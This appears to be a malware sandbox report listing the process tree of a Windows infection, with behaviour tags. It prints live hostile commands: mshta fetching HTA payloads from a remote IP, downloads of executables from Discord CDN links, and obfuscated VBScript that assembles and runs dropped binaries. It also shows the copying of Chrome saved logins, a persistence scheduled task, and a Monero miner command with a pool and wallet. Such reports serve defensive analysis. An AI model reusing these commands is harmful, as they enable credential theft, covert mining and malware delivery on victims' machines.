C:\Users\Admin\AppData\Local\Temp\cler.exe"C:\Users\Admin\AppData\Local\Temp\cler.exe"8⤵
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\Pictures\Adobe Films\H6UM5D_oAJb1wY44F0H9W53a.exe"C:\Users\Admin\Pictures\Adobe Films\H6UM5D_oAJb1wY44F0H9W53a.exe"7⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" http://185.7.214.7/LOADX/m.hta8⤵
- Blocklisted process makes network request
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" http://185.7.214.7/LOADX/r.hta8⤵
-
C:\Users\Admin\Pictures\Adobe Films\hschgIT73zIyo43yY5y_5zDy.exe"C:\Users\Admin\Pictures\Adobe Films\hschgIT73zIyo43yY5y_5zDy.exe"7⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\542D.tmp\542E.tmp\542F.bat "C:\Users\Admin\Pictures\Adobe Films\hschgIT73zIyo43yY5y_5zDy.exe""8⤵
-
C:\Users\Admin\AppData\Local\Temp\542D.tmp\542E.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\542D.tmp\542E.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""9⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\542D.tmp\542E.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\542D.tmp\542E.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/904756451950616599/904756476982222878/18.exe" "18.exe" "" "" "" "" "" ""9⤵
-
C:\Users\Admin\AppData\Local\Temp\542D.tmp\542E.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\542D.tmp\542E.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/904756451950616599/904756503808991242/Transmissibility.exe" "Transmissibility.exe" "" "" "" "" "" ""9⤵
-
C:\Users\Admin\AppData\Local\Temp\4795\18.exe18.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\4795\Transmissibility.exeTransmissibility.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\542D.tmp\542E.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\542D.tmp\542E.tmp\extd.exe "" "" "" "" "" "" "" "" ""9⤵
-
C:\Users\Admin\Pictures\Adobe Films\sF0PPpnmkNGtoshXjIcSBrPz.exe"C:\Users\Admin\Pictures\Adobe Films\sF0PPpnmkNGtoshXjIcSBrPz.exe"7⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\sF0PPpnmkNGtoshXjIcSBrPz.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\sF0PPpnmkNGtoshXjIcSBrPz.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )8⤵
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\sF0PPpnmkNGtoshXjIcSBrPz.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\sF0PPpnmkNGtoshXjIcSBrPz.exe" ) do taskkill -im "%~NxK" -F9⤵
-
C:\Users\Admin\AppData\Local\Temp\8pWB.eXE8pWB.eXe /pO_wtib1KE0hzl7U9_CYP10⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )11⤵
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F12⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ("WSCRIPt.SheLl" ). rUn ("C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl + _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " ,0 , TruE ) )11⤵
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl+ _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"13⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\N3V4H8H.SXY13⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "sF0PPpnmkNGtoshXjIcSBrPz.exe" -F10⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\AcE5WunU9rbhvxIHGczo1xiA.exe"C:\Users\Admin\Pictures\Adobe Films\AcE5WunU9rbhvxIHGczo1xiA.exe"7⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=18⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--ZgwMku75"9⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x298,0x294,0x290,0x2bc,0x28c,0x7ff88db2dec0,0x7ff88db2ded0,0x7ff88db2dee010⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1728,14318272383274401953,8655748063075876082,131072 --lang=ja --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6820_864999767" --mojo-platform-channel-handle=1744 /prefetch:810⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun0351a0558292.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8A101816\Sun0351a0558292.exeSun0351a0558292.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun0328255c4bce6fb.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8A101816\Sun0328255c4bce6fb.exeSun0328255c4bce6fb.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun03f5d51697d04.exe5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun03ea09aa5c9686e5.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun038db98f99bf9a.exe5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 420 -s 5805⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\wlanext.exe"C:\Windows\SysWOW64\wlanext.exe"2⤵
- Adds policy Run key to start application
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\Pictures\Adobe Films\UzYxXqOkTtDpwSezwVXY7Exr.exe"3⤵
-
C:\Windows\SysWOW64\cmd.exe/c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V3⤵
-
C:\Program Files\Mozilla Firefox\Firefox.exe"C:\Program Files\Mozilla Firefox\Firefox.exe"3⤵
-
C:\Program Files (x86)\Hsnulor\updateppq.exe"C:\Program Files (x86)\Hsnulor\updateppq.exe"2⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
-
C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T /R2⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8A101816\Sun03ea09aa5c9686e5.exeSun03ea09aa5c9686e5.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"3⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"4⤵
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"5⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"6⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"5⤵
- Blocklisted process makes network request
-
C:\Users\Admin\AppData\Roaming\services64.exeC:\Users\Admin\AppData\Roaming\services64.exe6⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"7⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"8⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"9⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth8⤵
-
C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\8767932.exe"C:\Users\Admin\AppData\Roaming\8767932.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\1444996.exe"C:\Users\Admin\AppData\Roaming\1444996.exe"4⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\5906233.exe"C:\Users\Admin\AppData\Roaming\5906233.exe"4⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\7573297.exe"C:\Users\Admin\AppData\Roaming\7573297.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBscript:cLosE(CreAteoBject ( "WscRipT.SheLL"). RuN ( "CmD /q /r COpy /y ""C:\Users\Admin\AppData\Roaming\7573297.exe"" ..\O0rNF.EXE &&StarT ..\O0rNF.Exe /P2shWm1kbqdY & If """"== """" for %a In ( ""C:\Users\Admin\AppData\Roaming\7573297.exe"" ) do taskkill /iM ""%~Nxa"" -f " , 0, TRue) )5⤵
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /r COpy /y "C:\Users\Admin\AppData\Roaming\7573297.exe" ..\O0rNF.EXE&&StarT ..\O0rNF.Exe /P2shWm1kbqdY &If ""== "" for %a In ( "C:\Users\Admin\AppData\Roaming\7573297.exe" ) do taskkill /iM "%~Nxa" -f6⤵
-
C:\Users\Admin\AppData\Local\Temp\O0rNF.EXE..\O0rNF.Exe /P2shWm1kbqdY7⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBscript:cLosE(CreAteoBject ( "WscRipT.SheLL"). RuN ( "CmD /q /r COpy /y ""C:\Users\Admin\AppData\Local\Temp\O0rNF.EXE"" ..\O0rNF.EXE &&StarT ..\O0rNF.Exe /P2shWm1kbqdY & If ""/P2shWm1kbqdY ""== """" for %a In ( ""C:\Users\Admin\AppData\Local\Temp\O0rNF.EXE"" ) do taskkill /iM ""%~Nxa"" -f " , 0, TRue) )8⤵
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /r COpy /y "C:\Users\Admin\AppData\Local\Temp\O0rNF.EXE" ..\O0rNF.EXE&&StarT ..\O0rNF.Exe /P2shWm1kbqdY &If "/P2shWm1kbqdY "== "" for %a In ( "C:\Users\Admin\AppData\Local\Temp\O0rNF.EXE" ) do taskkill /iM "%~Nxa" -f9⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBscrIpt: CloSe ( creATEObjecT( "wsCRIpT.sHell" ). RUN ( "Cmd /C Echo | set /p = ""MZ"" > q7PV.R & Copy /y /b Q7PV.R + 21_qTAy.5T + Z8D16.1 ..\MGLZR6G.SL1 & sTArt control ..\MgLZR6G.SL1 &Del /q * " , 0, TRuE) )8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C Echo | set /p = "MZ" > q7PV.R & Copy /y /b Q7PV.R + 21_qTAy.5T+Z8D16.1 ..\MGLZR6G.SL1 & sTArt control ..\MgLZR6G.SL1 &Del /q *9⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Echo "10⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" set /p = "MZ" 1>q7PV.R"10⤵
-
C:\Windows\SysWOW64\control.execontrol ..\MgLZR6G.SL110⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\MgLZR6G.SL111⤵
- Loads dropped DLL
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\MgLZR6G.SL112⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\MgLZR6G.SL113⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /iM "7573297.exe" -f7⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Roaming\5505137.exe"C:\Users\Admin\AppData\Roaming\5505137.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\681845.exe"C:\Users\Admin\AppData\Roaming\681845.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe"C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"3⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )4⤵
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"5⤵
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi6⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )7⤵
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC8⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "9⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"9⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC9⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "search_hyperfs_206.exe"6⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\4.exe"C:\Users\Admin\AppData\Local\Temp\4.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2332 -s 7924⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2332 -s 8404⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2332 -s 8044⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2332 -s 8524⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2332 -s 9204⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\chenxiulan-game.exe"C:\Users\Admin\AppData\Local\Temp\chenxiulan-game.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=14⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--ZgwMku75"5⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1e8,0x1ec,0x1f0,0x1c4,0x1f4,0x7ff88db2dec0,0x7ff88db2ded0,0x7ff88db2dee06⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1920,12776749200641527296,5225821497630061563,131072 --lang=ja --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5576_191275870" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2436 /prefetch:16⤵
- Checks computer location settings
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1920,12776749200641527296,5225821497630061563,131072 --lang=ja --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5576_191275870" --mojo-platform-channel-handle=2032 /prefetch:86⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1920,12776749200641527296,5225821497630061563,131072 --lang=ja --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5576_191275870" --mojo-platform-channel-handle=2016 /prefetch:86⤵
- Loads dropped DLL
- Checks whether UAC is enabled
- Modifies system certificate store
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1920,12776749200641527296,5225821497630061563,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5576_191275870" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1968 /prefetch:26⤵
-
